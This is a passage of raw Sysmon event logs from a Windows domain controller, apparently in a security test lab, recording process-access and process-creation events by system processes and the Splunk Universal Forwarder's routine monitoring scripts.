Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.223{59A5CD1D-8E5C-6005-6100-00000000A301}3464C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6000-00000000A301}3492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6000-00000000A301}3492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6000-00000000A301}3492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.114{59A5CD1D-8E5C-6005-6000-00000000A301}3492C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000002334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.979{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_r0bjdzfj.ckf.ps12021-01-18 13:34:21.979 10341000x80000000000000002333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.971{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.941{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 